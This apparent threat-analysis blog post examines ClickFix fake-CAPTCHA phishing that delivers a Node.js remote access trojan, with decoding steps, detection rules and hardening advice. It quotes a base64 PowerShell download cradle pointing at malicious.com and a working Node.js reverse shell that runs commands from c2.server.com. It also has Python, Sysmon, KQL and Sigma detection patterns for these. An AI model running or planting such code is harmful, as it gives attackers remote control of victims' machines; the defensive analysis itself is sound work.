ClickFix CAPTCHA Chaos: New Nodejs RAT Bypasses Defenses via PowerShell Obfuscation

Introduction:

The ClickFix phishing technique, which gained notoriety in early 2025 for distributing malware like LegionLoader and LummaStealer, has now evolved to deliver a sophisticated Node.js-based remote access Trojan (RAT) targeting Windows systems. Attackers leverage fake CAPTCHA prompts to deceive victims into executing a hidden, base64-encoded PowerShell command that silently downloads a self-contained MSI installer equipped with a full Node.js runtime environment, enabling powerful post-exploitation capabilities.

Learning Objectives:

  • Understand the ClickFix delivery vector and how fake CAPTCHA prompts are used to trigger malicious PowerShell execution.
  • Analyze the Node.js-based RAT’s behavior, including its evasion techniques and communication methods.
  • Implement detection, mitigation, and forensic analysis strategies using Windows and Linux commands, Sysmon, and EDR rules.

You Should Know:

1. Decoding the Base64 PowerShell Command

The initial attack vector is a social-engineered CAPTCHA page whose JavaScript places a command on the clipboard and then tells the visitor to "verify" by pressing Win+R, then Ctrl+V, then Enter, which pastes and runs that command from the Windows Run dialog. The pasted command is typically a powershell.exe invocation with a hidden window, and its payload is carried as a base64-encoded string so that nothing readable appears in the Run box. To analyze it, extract the encoded portion and decode it using the following steps.

Step‑by‑step guide to decode the malicious PowerShell command:

  • On a safe analysis machine (isolated VM), capture the full PowerShell command from the fake CAPTCHA page or email attachment.
  • Copy the base64 string (the long token after -EncodedCommand; PowerShell also accepts the abbreviations -e, -ec and -enc). The blob is the UTF-16LE encoding of the script, not plain ASCII, so a raw base64 decode shows every character followed by a NUL byte.
  • Use a Linux terminal or Windows PowerShell to decode:

Linux command (base64 -d alone prints the UTF-16LE bytes with interleaved NULs; iconv converts them to readable UTF-8):

echo "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQALgBtAHMAaQAnACkA" | base64 -d | iconv -f UTF-16LE -t UTF-8

Windows PowerShell: the equivalent is to convert the string with [Convert]::FromBase64String and decode the resulting bytes with [Text.Encoding]::Unicode.GetString, the UTF-16LE encoder PowerShell itself uses for -EncodedCommand. Decoding with the ASCII or UTF-8 encoder produces the same NUL-interleaved output as the raw Linux decode.

  • The decoded output typically reveals a download cradle that fetches an MSI installer from a remote server and runs it via `Invoke-Expression`, `Start-Process` or `msiexec /i`. The sample blob above decodes to IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.msi'), which is an illustrative cradle rather than a working MSI stage: DownloadString fetches text for Invoke-Expression to evaluate, whereas an MSI has to be written to disk (DownloadFile, or Invoke-WebRequest -OutFile) and handed to msiexec.
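The steps above carried out in Python, as an added example (this code is not part of the original post or of any tool it names): it pulls the blob out of a full command line, decodes it as UTF-16LE, and reports the cradle keywords, URLs and evasion flags an analyst wants at a glance. The sample blob is the one quoted above; the surrounding -w hidden -nop -ep bypass flags, the function names and the regex-based flag matching are assumptions about what a ClickFix one-liner looks like, not something taken from the page.

```python
import base64
import re

# Constructed sample: the -EncodedCommand blob quoted earlier in this section, wrapped in
# the kind of command line a ClickFix page pastes into the Run dialog (the flags are assumed).
SAMPLE_ENCODED = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
    "LgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkA"
    "bwB1AHMALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQALgBtAHMAaQAnACkA"
)
SAMPLE_CMDLINE = "powershell.exe -w hidden -nop -ep bypass -EncodedCommand " + SAMPLE_ENCODED

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# -ep / -ex(ecutionpolicy) must not be mistaken for it, hence the (c|n...) alternation.
ENCODED_FLAG = re.compile(r"(?<=\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_FLAG = re.compile(r"-e(?:p|x[a-z]*)\s+bypass", re.I)
URL_RE = re.compile(r"""https?://[^\s'"()]+""")
# API names typical of download-and-run cradles; reported in this order
CRADLE_KEYWORDS = ["IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
                   "Invoke-WebRequest", "Start-Process", "msiexec", "FromBase64String"]


def decode_encoded_command(blob: str) -> str:
    """Decode an -EncodedCommand payload: base64 over UTF-16LE (padding is often stripped)."""
    blob = blob.strip()
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # Not UTF-16 (a hand-rolled loader may base64 plain UTF-8): show the bytes losslessly
        return raw.decode("latin-1")


def triage_command_line(cmdline: str) -> dict:
    """Decode the blob (if any) and list the indicators a ClickFix one-liner typically carries."""
    m = ENCODED_FLAG.search(cmdline)
    decoded = decode_encoded_command(m.group(1)) if m else ""
    text = cmdline + "\n" + decoded          # scan both the visible flags and the hidden script
    return {
        "encoded": m is not None,
        "decoded": decoded,
        "hidden_window": HIDDEN_FLAG.search(cmdline) is not None,
        "policy_bypass": BYPASS_FLAG.search(cmdline) is not None,
        "urls": URL_RE.findall(text),
        "indicators": [k for k in CRADLE_KEYWORDS
                       if re.search(r"\b" + re.escape(k) + r"\b", text, re.I)],
    }


if __name__ == "__main__":
    for key, value in triage_command_line(SAMPLE_CMDLINE).items():
        print(f"{key:14} {value}")
```

Run it on the command line recovered from a Run dialog or a 4688/Sysmon event; the decoded field is what Script Block Logging would have recorded, and the indicators list is a quick way to decide whether the URL needs sandboxing before anything else.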

2. Analyzing the MSI Installer and Node.js Runtime

The decoded PowerShell downloads a self-contained MSI package that bundles a portable Node.js runtime (node.exe plus the RAT's script), so the implant does not depend on Node.js being installed on the host and behaves identically across Windows versions. Because node.exe is a legitimate, signed binary, the malicious logic lives entirely in the JavaScript it loads: static scanning of the executable finds nothing, and allowlists that trust by publisher rather than by path let it run.

Step‑by‑step guide to extract and inspect the MSI:

  • Retrieve the MSI URL from the decoded command (e.g., `http://malicious.com/payload.msi`).
  • Download the MSI in a sandbox environment.
  • Use `msiexec` to perform an administrative installation, which unpacks the embedded files without registering the product:

Windows command:

msiexec /a payload.msi /qb TARGETDIR=C:\ExtractedMSI

  • Caveat: an administrative install still runs the package's AdminExecuteSequence, so a hostile MSI can execute custom actions during extraction. Do this only in a disposable VM, or unpack passively with a tool that reads the MSI database without msiexec (lessmsi or 7-Zip on Windows, msiextract from msitools on Linux).
  • Navigate to the extracted directory and look for a folder containing `node.exe` and a JavaScript entry point (e.g., `index.js` or `agent.js`).
  • Examine the JavaScript code for C2 communication, persistence mechanisms, and RAT capabilities (file upload, command execution, keylogging).

Example suspicious Node.js code snippet (a minimal TCP reverse shell: every chunk received from the C2 host is run as a shell command and its output is written back):

// Raw TCP socket to the C2 endpoint; port 443 is chosen to blend in with HTTPS traffic
const net = require('net');
const exec = require('child_process').exec;
const client = net.connect({ port: 443, host: 'c2.server.com' });
// Each inbound chunk is treated as a command line for the default shell (cmd.exe on Windows)
client.on('data', function (cmd) {
  exec(cmd.toString(), (err, stdout, stderr) => {
    // Send back whatever the command produced so the operator sees the result, errors included
    client.write(stdout || stderr || '');
  });
});
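As an added example (not code from the original post), the inspection step in Python: given the directory that msiexec /a produced, it walks the tree, hashes node.exe and every script, and pulls from the JavaScript the facts the bullets above ask for: modules required, command-execution calls, persistence hints and the C2 host/port. demo() builds a throwaway directory containing a placeholder node.exe, the reverse-shell agent quoted above and one benign helper, all constructed here; the keyword lists and function names are assumptions about what to look for, not a signature set from any vendor.

```python
import hashlib
import os
import re
import tempfile

# Constructed sample agent: the reverse-shell snippet quoted above, saved as agent.js.
SAMPLE_AGENT_JS = """const net = require('net');
const exec = require('child_process').exec;
const client = net.connect({port: 443, host: 'c2.server.com'});
client.on('data', function(cmd) {
  exec(cmd.toString(), (err, out) => client.write(out));
});
"""

REQUIRE_RE = re.compile(r"""require\(\s*['"]([^'"]+)['"]\s*\)""")
HOST_RE = re.compile(r"""host\s*:\s*['"]([^'"]+)['"]""")
PORT_RE = re.compile(r"port\s*:\s*(\d+)")
URL_RE = re.compile(r"""(?:wss?|https?)://[^\s'"`]+""")
# Modules and calls that give a script network reach and command execution
RISKY_MODULES = {"net", "tls", "child_process", "http", "https", "ws", "dgram"}
DANGEROUS_CALLS = ["exec(", "execSync(", "spawn(", "eval(", "new Function("]
# Persistence hints: Run key (backslashes may be doubled in JS source), scheduled tasks, Startup
PERSISTENCE_PATTERNS = [r"CurrentVersion\\+Run", r"schtasks", r"\bStartup\b"]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def analyze_script(text):
    """Static facts about one JavaScript file: imports, exec calls, persistence, C2 endpoints."""
    requires = REQUIRE_RE.findall(text)
    hosts, ports = HOST_RE.findall(text), [int(p) for p in PORT_RE.findall(text)]
    return {
        "requires": requires,
        "risky_modules": sorted(RISKY_MODULES.intersection(requires)),
        "dangerous_calls": [c for c in DANGEROUS_CALLS if c in text],
        "persistence": [p for p in PERSISTENCE_PATTERNS if re.search(p, text)],
        "c2": [{"host": h, "port": p} for h, p in zip(hosts, ports)]
              + [{"url": u} for u in URL_RE.findall(text)],
    }


def triage_extracted_msi(root):
    """Walk an extracted MSI tree; report bundled node.exe binaries and rank the scripts."""
    report = {"node_runtime": [], "scripts": []}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path, low = os.path.join(dirpath, name), name.lower()
            if low == "node.exe":
                report["node_runtime"].append({"path": path, "sha256": sha256_file(path)})
            elif low.endswith((".js", ".cjs", ".mjs")):
                with open(path, "r", encoding="utf-8", errors="replace") as f:
                    facts = analyze_script(f.read())
                entry = {"path": path, "sha256": sha256_file(path), **facts}
                entry["score"] = sum(len(facts[k]) for k in
                                     ("risky_modules", "dangerous_calls", "persistence", "c2"))
                report["scripts"].append(entry)
    report["scripts"].sort(key=lambda e: e["score"], reverse=True)  # most suspicious first
    return report


def demo():
    """Build a constructed extraction directory and triage it; returns the report."""
    with tempfile.TemporaryDirectory() as root:
        app = os.path.join(root, "App")
        os.makedirs(app)
        with open(os.path.join(app, "node.exe"), "wb") as f:
            f.write(b"MZ placeholder, not a real PE")       # stand-in for the bundled runtime
        with open(os.path.join(app, "agent.js"), "w") as f:
            f.write(SAMPLE_AGENT_JS)
        with open(os.path.join(app, "helper.js"), "w") as f:
            f.write("module.exports = (a, b) => a + b;\n")   # benign, constructed
        return triage_extracted_msi(root)


if __name__ == "__main__":
    for entry in demo()["scripts"]:
        print(entry["score"], entry["path"], entry["c2"], entry["dangerous_calls"])
```

Point triage_extracted_msi at C:\ExtractedMSI (or the msiextract output) and read the top-scored script first; the sha256 values are what go to VirusTotal, and the c2 list feeds the network hunt in the next section.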

3. Network Indicators and C2 Communication

The Node.js RAT typically uses encrypted channels (HTTPS/WSS) or raw TCP sockets, and putting a raw socket on port 443 (as in the snippet above) is a common way to blend into HTTPS traffic, so the port alone discriminates nothing. The stronger indicator is the process: outbound connections from a `node.exe` running outside Program Files, especially to newly registered domains or IPs with low reputation, or a session on 443 whose TLS handshake looks wrong for a browser (no SNI, an unusual JA3 fingerprint, a self-signed certificate).

Step‑by‑step guide to detect C2 traffic:

  • Use `netstat` to list established connections together with the owning executable (the -b switch that names it requires an elevated prompt):

Windows:

netstat -anob | findstr ESTABLISHED

  • Correlate the PID with the image path, user and parent using tasklist (replace 1234 with the PID from netstat):

tasklist /v /fi "PID eq 1234"

  • On Linux (a capture host on a mirror/SPAN port, or a gateway in the path), use `tcpdump` to capture the suspect host's traffic:

sudo tcpdump -i eth0 host <suspicious_ip> -w capture.pcap

  • Analyze the PCAP in Wireshark. For plaintext sockets, `tcp.port == 443 && !tls` isolates raw command traffic hiding on the HTTPS port and `http.upgrade == "websocket"` finds WebSocket upgrades; for real TLS you will not see JavaScript or commands, so pivot to the handshake instead: `tls.handshake.extensions_server_name` for the contacted hostname and `tls.handshake.ja3` for the client fingerprint.

4. Detecting Node.js RATs with Sysmon and EDR

To proactively detect execution of Node.js-based malware, configure Sysmon to log process creation, network connections, and file hashes. Node.js RATs often run `node.exe` from temporary or unusual paths.

Step‑by‑step Sysmon configuration:

  • Install Sysmon from Microsoft Sysinternals.
  • Use a configuration file (sysmon-config.xml) with include rules for process creation and network connections by node.exe. Conditions listed directly under an event type are OR'ed, so the two ProcessCreate conditions must be wrapped in `<Rule groupRelation="and">`; otherwise the filter also matches every process whose command line mentions a .js file. A DestinationPort condition is deliberately omitted: a RAT on a non-443 port would otherwise never be logged.

<Sysmon schemaversion="4.90">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include">
        <Rule groupRelation="and">
          <Image condition="end with">\node.exe</Image>
          <CommandLine condition="contains">.js</CommandLine>
        </Rule>
      </ProcessCreate>
      <NetworkConnect onmatch="include">
        <Image condition="end with">\node.exe</Image>
      </NetworkConnect>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

  • Launch Sysmon (set schemaversion to the one your Sysmon release supports; newer binaries accept older schemas):

sysmon64.exe -accepteula -i sysmon-config.xml

  • Monitor Event IDs 1 (process creation) and 3 (network connection) in Event Viewer under Applications and Services Logs > Microsoft > Windows > Sysmon > Operational, or forward them to a SIEM. Event ID 1 also carries ParentImage, so the powershell.exe → msiexec.exe → node.exe chain is visible from the same log.

EDR hunting query example (KQL, Microsoft Defender advanced hunting; FolderPath holds the full image path, and the parent filter narrows hits to the installer chain):

DeviceProcessEvents
| where FileName =~ "node.exe"
| where ProcessCommandLine contains ".js"
| where FolderPath contains @"\Temp\" or FolderPath contains @"\AppData\" or FolderPath contains @"\Users\Public\"
| where InitiatingProcessFileName in~ ("msiexec.exe", "powershell.exe", "pwsh.exe", "cmd.exe")
| project Timestamp, DeviceName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine

5. Mitigation Strategies: Application Control and PowerShell Logging

Preventing execution of such RATs requires layered defenses. The controls that actually break the chain are application control (which decides whether node.exe may run at all) and PowerShell logging (which makes the decoded command visible); PowerShell's execution policy is not one of them.

Step‑by‑step mitigation:

  • Enable PowerShell Script Block Logging (Windows Group Policy): navigate to Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell and enable “Turn on PowerShell Script Block Logging” and “Turn on PowerShell Transcription” (PowerShell 7 ships separate policy templates, the “PowerShell Core” node, with the same settings). Script blocks are logged after decoding, so an -EncodedCommand payload appears in clear text in Event ID 4104.

  • Do not rely on the execution policy. The following makes script files non-runnable machine-wide:

Set-ExecutionPolicy Restricted -Scope LocalMachine

    but execution policy governs only .ps1 files, not commands passed on the command line or via -EncodedCommand, and the ClickFix one-liner typically adds -ExecutionPolicy Bypass anyway; Microsoft documents it as a safety feature, not a security boundary. Treat it as hygiene and put the enforcement in application control.

  • Deploy AppLocker or WDAC to block execution of `node.exe` from user-writable directories (e.g., %TEMP%, %LOCALAPPDATA%, %APPDATA%, %PUBLIC%). A publisher-only rule is insufficient here because the campaign ships a genuine, signed node.exe; combine the publisher condition with a path condition so that only node.exe under Program Files is allowed. The same WDAC/AppLocker policy also places PowerShell into Constrained Language Mode, which removes the .NET and COM access that download cradles depend on.

  • Network-level mitigation: block known malicious IPs and domains via firewall or DNS filtering, and feed newly registered domains from threat intelligence into the blocklist dynamically.

6. Linux/Windows Commands for Forensic Analysis

If an infection is suspected, collect artifacts from affected Windows systems using the following commands (run from an elevated prompt; `netstat -b` needs it).

Collect running processes and network connections:

tasklist /v > processes.txt
netstat -anob > connections.txt

Extract PowerShell history (user-level). This only covers interactive PSReadLine sessions; a command pasted into the Run dialog never reaches it, so also export the Run dialog's MRU list under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which retains what the user pasted, and the PowerShell Operational event log, where Event ID 4104 holds the decoded script block:

Get-Content (Get-PSReadlineOption).HistorySavePath

Search for downloaded MSI files in the usual drop locations (user profiles, which cover Downloads and each per-user Temp, plus the system Temp):

dir C:\Users\*.msi /s /b
dir C:\Windows\Temp\*.msi /s /b

On Linux (as analysis workstation), calculate hashes of suspicious files (SHA-256 is what intel platforms key on; MD5 is only useful for matching older reports):

sha256sum payload.msi extracted.js
md5sum extracted.js

Submit hashes to VirusTotal or threat intel platforms.

7. Hardening Against ClickFix Techniques

User education is critical, but technical controls can reduce the risk of fake CAPTCHA interactions.

Step‑by‑step hardening:

  • Do not expect the browser to stop the clipboard step: a page may write to the clipboard during a user gesture such as the CAPTCHA click, and the browser clipboard-permission policies are aimed at reads, so do not rely on them here. The reliable control is the other end of the trick, the Run dialog: the Group Policy “Remove Run menu from Start Menu” (User Configuration -> Administrative Templates -> Start Menu and Taskbar) also disables Win+R for the users it applies to. Where that is too disruptive, at least block powershell.exe as a child of explorer.exe via application control or an EDR custom rule.
  • PowerShell Constrained Language Mode blunts the cradle even if it runs, but it has to be enforced by a WDAC or AppLocker policy. Setting it on the current session

$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

    is useful for testing what breaks and nothing more: it does not survive a new powershell.exe, which is exactly what the Run dialog launches.
  • Implement browser extension controls and web filtering to block known phishing domains hosting fake CAPTCHAs.
  • Deploy endpoint detection rules that flag `powershell.exe` spawned by `explorer.exe` (the parent of anything launched from Win+R) with a command line containing `-EncodedCommand`, `-w hidden` or a download cradle, and `msiexec.exe` installing a package from a user-writable path.

Example Sigma rule for detection. Matching '-EncodedCommand' in ScriptBlockText does not work: script block logging records the decoded script, and the flag only ever appears on the process command line, so the rule is a process_creation rule keyed on the Run dialog parent. A companion rule on the powershell log should require ScriptBlockText to contain both a download cradle and '.msi', since each alone is too noisy:

title: ClickFix PowerShell Launched From Run Dialog
status: experimental
description: powershell.exe started by explorer.exe (Win+R) with an encoded or downloading command line
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cmd:
        CommandLine|contains:
            - ' -e '
            - ' -ec '
            - '-enc'
            - 'DownloadString'
            - 'DownloadFile'
            - 'Invoke-WebRequest'
            - '.msi'
    condition: selection_parent and selection_cmd
falsepositives:
    - Administrators launching PowerShell one-liners from the Run dialog
level: high
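Putting the Sysmon, KQL and Sigma logic from sections 3, 4 and 7 into one runnable form, as an added example that is not from the original post: the Python below evaluates constructed Sysmon Event ID 1/3 and PowerShell 4104 records (field names follow the Sysmon schema; every value, GUID and path is invented) against the rules this page describes: a hidden or encoded PowerShell whose parent is explorer.exe, node.exe starting or connecting out from a user-writable path, the msiexec.exe → node.exe ancestry, and a decoded script block carrying a download cradle plus an .msi reference. It also shows why a port condition does not belong in the rule: the benign developer node.exe talks to 443 as well and is cleared by its path, not its port. Rule names and the detect() function are mine.

```python
import re

# Constructed sample telemetry: dicts shaped like Sysmon Event ID 1 (process create),
# Event ID 3 (network connect) and PowerShell Event ID 4104 (script block) after JSON
# parsing. Field names follow the Windows/Sysmon schema; every value is invented.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NODE_TMP = r"C:\Users\alice\AppData\Local\Temp\App\node.exe"
SAMPLE_EVENTS = [
    # ClickFix chain: Run dialog -> hidden PowerShell -> msiexec -> node.exe from Temp
    {"EventID": 1, "ProcessGuid": "G1", "ParentProcessGuid": "G0", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS, "CommandLine": "powershell.exe -w hidden -nop -ep bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0A..."},
    {"EventID": 4104, "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.msi')"},
    {"EventID": 1, "ProcessGuid": "G2", "ParentProcessGuid": "G1", "ParentImage": PS,
     "Image": r"C:\Windows\System32\msiexec.exe", "CommandLine": r"msiexec /i C:\Users\alice\AppData\Local\Temp\payload.msi /qn"},
    {"EventID": 1, "ProcessGuid": "G3", "ParentProcessGuid": "G2", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": NODE_TMP, "CommandLine": r"node.exe C:\Users\alice\AppData\Local\Temp\App\agent.js"},
    {"EventID": 3, "ProcessGuid": "G3", "Image": NODE_TMP, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    # Benign: a plain PowerShell from Win+R, and a developer's node.exe from Program Files on 443
    {"EventID": 1, "ProcessGuid": "G5", "ParentProcessGuid": "G0", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS, "CommandLine": "powershell.exe"},
    {"EventID": 1, "ProcessGuid": "G9", "ParentProcessGuid": "G8", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Program Files\nodejs\node.exe", "CommandLine": "node.exe build.js"},
    {"EventID": 3, "ProcessGuid": "G9", "Image": r"C:\Program Files\nodejs\node.exe", "DestinationIp": "198.51.100.7", "DestinationPort": 443},
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (but not -ep / -ex...)
ENCODED_FLAG = re.compile(r"(?<=\s)-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}", re.I)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I)
USER_WRITABLE = re.compile(r"\\(?:Temp|AppData|ProgramData|Users\\Public)\\", re.I)


def base(image):
    """File name of an image path, lower-cased for comparison."""
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(event, by_guid):
    """Parent, grandparent, ... image names reachable through ParentProcessGuid."""
    chain, guid = [], event.get("ParentProcessGuid")
    while guid in by_guid:
        chain.append(base(by_guid[guid]["Image"]))
        guid = by_guid[guid].get("ParentProcessGuid")
    return chain


def detect(events):
    """Return (rule_name, ProcessGuid) tuples in the order the events fire them."""
    by_guid = {e["ProcessGuid"]: e for e in events if e.get("EventID") == 1}
    alerts = []
    for e in events:
        eid = e.get("EventID")
        if eid == 1:
            img, parent, cmd = base(e["Image"]), base(e.get("ParentImage", "")), e.get("CommandLine", "")
            # Section 7: explorer.exe is the parent of anything launched from Win+R
            if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
                    and (ENCODED_FLAG.search(cmd) or CRADLE.search(cmd)):
                alerts.append(("clickfix_run_dialog_powershell", e["ProcessGuid"]))
            # Section 4: node.exe from Temp/AppData, then the installer ancestry behind it
            if img == "node.exe" and USER_WRITABLE.search(e["Image"]):
                alerts.append(("node_from_user_writable_path", e["ProcessGuid"]))
                chain = ancestors(e, by_guid)
                if chain[:1] == ["msiexec.exe"] or "powershell.exe" in chain:
                    alerts.append(("node_spawned_via_msiexec_chain", e["ProcessGuid"]))
        elif eid == 3:
            # Section 3: any outbound connection from a node.exe outside Program Files, any port
            if base(e["Image"]) == "node.exe" and USER_WRITABLE.search(e["Image"]):
                alerts.append(("node_outbound_from_user_writable_path", e["ProcessGuid"]))
        elif eid == 4104:
            # 4104 holds the decoded script, so the cradle and the .msi are matched here, not the flag
            text = e.get("ScriptBlockText", "")
            if CRADLE.search(text) and re.search(r"\.msi\b|msiexec", text, re.I):
                alerts.append(("scriptblock_msi_download_cradle", "-"))
    return alerts


if __name__ == "__main__":
    for rule, guid in detect(SAMPLE_EVENTS):
        print(f"{rule:40} {guid}")
```

The ancestry check accepts msiexec.exe as the direct parent rather than insisting on powershell.exe above it: custom actions are commonly executed by an msiexec.exe that the Windows Installer service started, so in real telemetry the grandparent may be services.exe even when PowerShell triggered the install.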

What Undercode Say:

  • Key Takeaway 1: ClickFix campaigns have rapidly evolved from delivering infostealers to full-featured RATs, leveraging legitimate Node.js runtime to evade static detection.
  • Key Takeaway 2: Base64-encoded PowerShell commands remain a preferred obfuscation method; organizations must enable deep script block logging and monitor for suspicious `node.exe` execution from temporary directories.
  • The shift to self-contained MSI installers with Node.js reflects a broader trend: malware authors are increasingly using cross-platform frameworks to simplify development and hinder analysis. Traditional antivirus struggles against such dynamically loaded JavaScript payloads because the executable it scans is a legitimate, signed runtime. Defenders need to focus on behavior-based detection: monitoring parent-child process relationships (e.g., `explorer.exe` spawning `powershell.exe`, and `msiexec.exe` spawning `node.exe` from a user-writable path) and unusual outbound TLS traffic. Additionally, application control by path plus publisher, and enforcing PowerShell Constrained Language Mode through that same WDAC/AppLocker policy, can break the attack chain at multiple points. Organizations should also integrate threat intelligence feeds that track newly registered domains used for MSI delivery. Finally, user awareness training must explicitly cover fake CAPTCHA tactics, as social engineering remains the most effective initial vector.

Prediction:

Over the next 12 months, threat actors will increasingly adopt Node.js and other JavaScript runtimes (e.g., Deno, Bun) for Windows and cross-platform malware, bypassing traditional PE-based detection. We expect to see ClickFix campaigns expand to macOS and Linux, using similar fake CAPTCHA prompts to deliver shell scripts or Electron-based RATs. Defenders will respond by deploying runtime containerization for browsers and enforcing stricter PowerShell execution policies, but the cat-and-mouse game will accelerate as attackers adopt AI-generated CAPTCHA lures that are nearly indistinguishable from legitimate ones. Organizations that fail to implement application control and robust PowerShell logging will remain highly vulnerable.

Reported By: Varshu25 Nodejs – Hackers Feeds